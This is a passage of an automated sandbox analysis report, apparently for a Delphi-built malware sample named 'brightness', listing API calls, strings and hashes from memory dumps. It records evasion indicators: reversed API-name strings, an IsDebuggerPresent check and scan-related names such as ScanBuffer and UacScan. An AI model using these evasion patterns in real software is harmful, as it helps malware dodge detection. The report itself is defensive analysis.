                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                • String ID:
                • API String ID: 185507032-0
                • Opcode ID: 82b33c3adfbba80c0e1c3f3edf1751c46f2e7179f8ee49801308684caf710e4d
                • Instruction ID: cbdb84b3b120b5651e8c40e1a6e8acb90e4c5428bc66eb189e85ee69cf4b166b
                • Opcode Fuzzy Hash: 82b33c3adfbba80c0e1c3f3edf1751c46f2e7179f8ee49801308684caf710e4d
                • Instruction Fuzzy Hash: 2A1170BE5582047AD380EB98CC80F9B77EDAB44310F400A29B364D60D0EB74E9448F77
                APIs
                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 028FE5A5
                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 028FE5C1
                • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 028FE5FA
                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 028FE677
                • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 028FE690
                • VariantCopy.OLEAUT32(?,00000000), ref: 028FE6C5
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                • String ID:
                • API String ID: 351091851-0
                • Opcode ID: 2c879650c84341011691a20226c27d6524aee0beb2559d3f6bcac5042424fc10
                • Instruction ID: be464917c49a7a8d744e7179dcf88fa339b9c3c0a8af4c3503efb2659c2af7a6
                • Opcode Fuzzy Hash: 2c879650c84341011691a20226c27d6524aee0beb2559d3f6bcac5042424fc10
                • Instruction Fuzzy Hash: F051A67D90062D9BCBA2DB58CC80AD9B3BDAF4D304F0441D5EB09E7216DA34AF858F65
                APIs
                • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028F358A
                • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,028F35D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028F35BD
                • RegCloseKey.ADVAPI32(?,028F35E0,00000000,?,00000004,00000000,028F35D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028F35D3
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: CloseOpenQueryValue
                • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                • API String ID: 3677997916-4173385793
                • Opcode ID: 5e38341b2ab0224eda170deec92cb0e767cbd4dff9580eea84c1b5c2ee16356e
                • Instruction ID: 2bc503d7480833372d2aa67e5ad0c1cd6ecf19ef3c1e5883965d23d3d6a55cfa
                • Opcode Fuzzy Hash: 5e38341b2ab0224eda170deec92cb0e767cbd4dff9580eea84c1b5c2ee16356e
                • Instruction Fuzzy Hash: DD01B57D944248BAF751DBD18D02BBD77FCD708B10F1005A1FF04D6680E679A610DA59
                APIs
                • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02908148,?,?,00000000,00000000,?,02908061,00000000,KernelBASE,00000000,00000000,02908088), ref: 0290810D
                • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02908113
                • GetProcAddress.KERNEL32(?,?), ref: 02908125
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: AddressProc$HandleModule
                • String ID: Kernel32$sserddAcorPteG
                • API String ID: 667068680-1372893251
                • Opcode ID: 2d9efe0b20670aa7bb04f3913b173becdfc2dabbfcc08dbd2213e2c49daa54a1
                • Instruction ID: 1656dea5703184e178b79c81e81ce08105d02a188fac54cba2c2c4264a731189
                • Opcode Fuzzy Hash: 2d9efe0b20670aa7bb04f3913b173becdfc2dabbfcc08dbd2213e2c49daa54a1
                • Instruction Fuzzy Hash: 8C01447DB44308AFE744EBA8D881A5E77EEEF89B10F514465AA00D7690D634AD108B51
                APIs
                • GetThreadLocale.KERNEL32(?,00000000,028FAA67,?,?,00000000), ref: 028FA9E8
                  • Part of subcall function 028FA744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 028FA762
                • GetThreadLocale.KERNEL32(00000000,00000004,00000000,028FAA67,?,?,00000000), ref: 028FAA18
                • EnumCalendarInfoA.KERNEL32(Function_0000A91C,00000000,00000000,00000004), ref: 028FAA23
                • GetThreadLocale.KERNEL32(00000000,00000003,00000000,028FAA67,?,?,00000000), ref: 028FAA41
                • EnumCalendarInfoA.KERNEL32(Function_0000A958,00000000,00000000,00000003), ref: 028FAA4C
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: Locale$InfoThread$CalendarEnum
                • String ID:
                • API String ID: 4102113445-0
                • Opcode ID: 0c700fde9e090d98cf64ec5c564069b771d6e1d0ff8218d02de03b0314439d08
                • Instruction ID: 6c6ffd32daf7656965314476927a1b69753fa8650542a4f78dad7e200c631e59
                • Opcode Fuzzy Hash: 0c700fde9e090d98cf64ec5c564069b771d6e1d0ff8218d02de03b0314439d08
                • Instruction Fuzzy Hash: 1601F73C3403546FF785EA6C8D12F6E735DDB46730F910220F728E6784E5689E144A66
                APIs
                • GetThreadLocale.KERNEL32(?,00000000,028FAC50,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 028FAAAF
                  • Part of subcall function 028FA744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 028FA762
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: Locale$InfoThread
                • String ID: eeee$ggg$yyyy
                • API String ID: 4232894706-1253427255
                • Opcode ID: 3db0f67b43536bfbf4541a60811470dbb7a3b2636f2bbc88323f1682e47f63ff
                • Instruction ID: 80db7a9d927ff1107c8a73aabfd80ac7b503faa002d824252544c30f2c1124a9
                • Opcode Fuzzy Hash: 3db0f67b43536bfbf4541a60811470dbb7a3b2636f2bbc88323f1682e47f63ff
                • Instruction Fuzzy Hash: 8041F53C3042094BE7D9EB6D888067FB3EBDB85224B504526D75EC7344EA78D909CA22
                APIs
                • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02908088,?,?,00000000,?,029079FE,ntdll,00000000,00000000,02907A43,?,?,00000000), ref: 02908056
                  • Part of subcall function 029080C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02908148,?,?,00000000,00000000,?,02908061,00000000,KernelBASE,00000000,00000000,02908088), ref: 0290810D
                  • Part of subcall function 029080C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02908113
                  • Part of subcall function 029080C0: GetProcAddress.KERNEL32(?,?), ref: 02908125
                • GetModuleHandleA.KERNELBASE(?), ref: 0290806A
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: HandleModule$AddressProc
                • String ID: AeldnaHeludoMteG$KernelBASE
                • API String ID: 1883125708-1952140341
                • Opcode ID: 1f6d93528671e3b564f4fde53bf9424e42643e50f9ec31f0de18938d9746b8b2
                • Instruction ID: 9425035ec733240abbb5707aae9e694ef073519a7afe95c9fe40ecd71006aae6
                • Opcode Fuzzy Hash: 1f6d93528671e3b564f4fde53bf9424e42643e50f9ec31f0de18938d9746b8b2
                • Instruction Fuzzy Hash: 86F06239B44708EFE740EFA8DC81DAA77ADF789B007914561FA00D3690E670BD109A65
                APIs
                • GetModuleHandleW.KERNEL32(KernelBase,?,0290F3CC,UacInitialize,0295237C,0291B40C,UacScan,0295237C,0291B40C,ScanBuffer,0295237C,0291B40C,OpenSession,0295237C,0291B40C,ScanString), ref: 0290EFCE
                • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0290EFE0
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: IsDebuggerPresent$KernelBase
                • API String ID: 1646373207-2367923768
                • Opcode ID: 6b12554e297be3687fdc950ab291e9ee1f3bec45a5a434e449796b29c857a911
                • Instruction ID: 4656af1767384fc6596a1d778f37a7533e3f044b8fda50bd2216a34bc9379bb4
                • Opcode Fuzzy Hash: 6b12554e297be3687fdc950ab291e9ee1f3bec45a5a434e449796b29c857a911
                • Instruction Fuzzy Hash: 44D0126A3553741DB51037F81CC581D134C8D855697200F30F272D51D3FA6B88611111
                APIs
                • GetModuleHandleA.KERNEL32(kernel32.dll,?,0291D10B,00000000,0291D11E), ref: 028FC3FA
                • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 028FC40B
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: GetDiskFreeSpaceExA$kernel32.dll
                • API String ID: 1646373207-3712701948
                • Opcode ID: 42fe187811693caed4b705fdab3c8b8df90bb01d5d07c9eb5a2caf3eefff4755
                • Instruction ID: f223eeb389e22dd7ea2cfb33bf6f7b549cd08a4086959129f58d9b5a01239cdf
                • Opcode Fuzzy Hash: 42fe187811693caed4b705fdab3c8b8df90bb01d5d07c9eb5a2caf3eefff4755
                • Instruction Fuzzy Hash: E6D0A76CE4431A4EF780EFF66C8163637C89724305F00D866E755D5202E7B94518CF60
                APIs
                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 028FE217
                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 028FE233
                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 028FE2AA
                • VariantClear.OLEAUT32(?), ref: 028FE2D3
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: ArraySafe$Bound$ClearIndexVariant
                • String ID:
                • API String ID: 920484758-0
                • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                • Instruction ID: 6ae4c045219c3b796b331452accd82b993e293b32fcb34f79c49afafc8967b2b
                • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                • Instruction Fuzzy Hash: CB41D77DA016299BCBA1DB5CCC90BD9B3BDAF49214F0041D5EB49E7211DA30AF848F51
                APIs
                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 028FACD9
                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 028FACFD
                • GetModuleFileNameA.KERNEL32(028F0000,?,00000105), ref: 028FAD18
                • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 028FADAE
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: FileModuleName$LoadQueryStringVirtual
                • String ID:
                • API String ID: 3990497365-0
                • Opcode ID: f829cd4e5bca7b3d2f995f07d533ebb767dc816127d45791537ebea49c8180f2
                • Instruction ID: 10ab58cf874656e11726eb45fff63e2d7f7376046c6cfdf6180b560f0c8c2434
                • Opcode Fuzzy Hash: f829cd4e5bca7b3d2f995f07d533ebb767dc816127d45791537ebea49c8180f2
                • Instruction Fuzzy Hash: 5A411D7DA402589BDBA1EB68CC84BDAB7FDAB08311F0440E5A64CE7251DB74AF848F51
                APIs
                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 028FACD9
                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 028FACFD
                • GetModuleFileNameA.KERNEL32(028F0000,?,00000105), ref: 028FAD18
                • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 028FADAE
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: FileModuleName$LoadQueryStringVirtual
                • String ID:
                • API String ID: 3990497365-0
                • Opcode ID: bed660fa06bb60ece5c2aedf5f4e47746007dd9ab8b2b4443d7a9f7714b5a8ff
                • Instruction ID: cbdeb137e6c65bedc56632d73939b46dae769120ce8b8d5717a132bf6c61c259
                • Opcode Fuzzy Hash: bed660fa06bb60ece5c2aedf5f4e47746007dd9ab8b2b4443d7a9f7714b5a8ff
                • Instruction Fuzzy Hash: 0241317DA402589BDBA1EB68CC84BDAB7FDAB08311F0440E5A74CE7251DB74AF848F51
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 398798eafb2d2a173f1834fa80a3a9cf5f3e8bed6425e0f856d8156d589a20bc
                • Instruction ID: a44643acf6239db483a67b8fcd874f99e28eb5468ff57bf29ee45a48a8f03e38
                • Opcode Fuzzy Hash: 398798eafb2d2a173f1834fa80a3a9cf5f3e8bed6425e0f856d8156d589a20bc
                • Instruction Fuzzy Hash: 33A1166E7102008BD758AA7C9C883BDB3D2DBD4325F18823EE31DCB785EB68C9558751
                APIs
                • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,028F955A), ref: 028F94F2
                • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,028F955A), ref: 028F94F8
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: DateFormatLocaleThread
                • String ID: yyyy
                • API String ID: 3303714858-3145165042
                • Opcode ID: 512adb160fbe18983f13102b826838fc9545bcd4d7f9d5b5622a9b09f1722dcf
                • Instruction ID: 417a61e19a31ebf79f5ca88e536787f87631cef77118cc750795f2d5c571e0c0
                • Opcode Fuzzy Hash: 512adb160fbe18983f13102b826838fc9545bcd4d7f9d5b5622a9b09f1722dcf
                • Instruction Fuzzy Hash: C421807DA002189FDB90DFA8C851BAEB3B9EF48710F4040A6EB09E7250D7749E40CB66
                APIs
                • IsBadReadPtr.KERNEL32(?,00000004), ref: 0290AD90
                • IsBadWritePtr.KERNEL32(?,00000004), ref: 0290ADC0
                • IsBadReadPtr.KERNEL32(?,00000008), ref: 0290ADDF
                • IsBadReadPtr.KERNEL32(?,00000004), ref: 0290ADEB
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: Read$Write
                • String ID:
                • API String ID: 3448952669-0
                • Opcode ID: a93baf0632f810e868fc304dc02f88cb2819ea7b8e0cd4cec62af5963c9676e9
                • Instruction ID: 4cf987eec7bbac07407d60a5247ee46a4967645d358eb5edef6108908165c2a8
                • Opcode Fuzzy Hash: a93baf0632f810e868fc304dc02f88cb2819ea7b8e0cd4cec62af5963c9676e9
                • Instruction Fuzzy Hash: 02215CB564031D9FDB10DF69CC81BAE77A9EF80361F008211EF54D7280EB38E9519AE4